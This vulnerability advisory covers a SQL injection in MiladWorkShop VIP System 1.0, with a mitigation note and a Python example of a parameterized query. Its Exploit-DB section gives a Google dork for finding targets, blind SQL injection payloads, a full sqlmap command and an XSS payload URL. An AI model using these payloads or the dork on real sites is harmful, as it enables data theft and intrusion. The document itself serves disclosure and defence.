Vendor: VIP System
Author: AYADI Mohamed
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: VIP System
Affected Version From: 1.x
Affected Version To: 1.x
Patch Exists: No
CPE: miladworkshop_vip_system:1.0
Platforms Tested: Kali Linux
Year: 2020

MiladWorkShop VIP System 1.0 – ‘lang’ SQL Injection

The MiladWorkShop VIP System 1.0 is vulnerable to SQL Injection in the 'lang' parameter. An attacker can exploit this vulnerability to execute arbitrary SQL queries and retrieve sensitive information.

Mitigation:

To mitigate this vulnerability, the vendor should validate and sanitize user-supplied input before using it in SQL queries. Input validation and parameterized queries can help prevent SQL Injection attacks.
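A small illustration of the mitigation above, added here and not part of the advisory or of the vendor's code: an in-memory SQLite table stands in for the application's schema (table and column names are assumptions), and the 'lang' lookup is shown in its string-concatenated form next to a bound-parameter form and an allowlisted form, using the boolean-based tautology from the advisory as input.

```python
import sqlite3

ALLOWED_LANGS = {"en", "fa", "ar"}

# Boolean-based blind style probe as it appears in the advisory: the
# tautology makes the WHERE clause true for every row and the comment
# marker discards the trailing quote.
PROBE = "en' OR 6146=6146-- "


def make_db():
    # Constructed stand-in for the language table; real schema is unknown.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE languages (code TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO languages VALUES (?, ?)",
                     [("en", "English"), ("fa", "Persian"), ("ar", "Arabic")])
    return conn


def lookup_lang_vulnerable(conn, lang):
    # Vulnerable pattern: user input is spliced into the SQL text, so a
    # quote in 'lang' changes the query structure.
    sql = "SELECT code, name FROM languages WHERE code = '%s'" % lang
    return conn.execute(sql).fetchall()


def lookup_lang_parameterized(conn, lang):
    # Bound parameter: the driver passes 'lang' as data, never as SQL,
    # so the probe simply matches no row.
    return conn.execute(
        "SELECT code, name FROM languages WHERE code = ?", (lang,)).fetchall()


def lookup_lang_safe(conn, lang):
    # Defence in depth: reject anything outside the known language codes
    # before touching the database, then still bind the parameter.
    if lang not in ALLOWED_LANGS:
        return []
    return lookup_lang_parameterized(conn, lang)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_lang_vulnerable(db, PROBE))   # every row
    print("bound:     ", lookup_lang_parameterized(db, PROBE))  # []
    print("allowlist: ", lookup_lang_safe(db, PROBE))           # []
```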

Exploit-DB raw data:

# Exploit Title: MiladWorkShop VIP System 1.0 - 'lang' SQL Injection
# Google Dork: Powered By MiladWorkShop VIP System
# Date: 2020-03-03
# Exploit Author: AYADI Mohamed
# email : ayadi.mohamed@outlook.com
# Vendor Homepage: https://miladworkshop.ir/
# Software Link: https://miladworkshop.ir/vip.html
# Version: 1.x
# Tested on: Kali Linux (sqlmap)
# CVE : N/A


[ SQL injection exploitation ]

Address : http://vip.target/forget
Request Type : Post

Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lang=en AND 3-4400' OR 6146=6146-- ivGZ21=6 AND 000wM2X=000wM2X

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: lang=en AND 3' AND (SELECT 2915 FROM (SELECT(SLEEP(50)))StCO)-- vkVG21=6 AND 000wM2X=000wM2X

example :
sqlmap -u "http://vip.target/forget" --data lang=en'%20AND%203*2*1%3d6%20AND%20'000wM2X'%3d'000wM2X --random-agent --banner --ignore-prox --hex --level 3 --risk 3 --time-sec=6 --timeout 100 --tamper="between.py"


[ XSS exploitation ]
http://vip.target/%22%3E%3Cimg%20src=%22aa%22%20onerror=%22alert(1)%22%3E%3C

#greetz to all Moroccan cyber security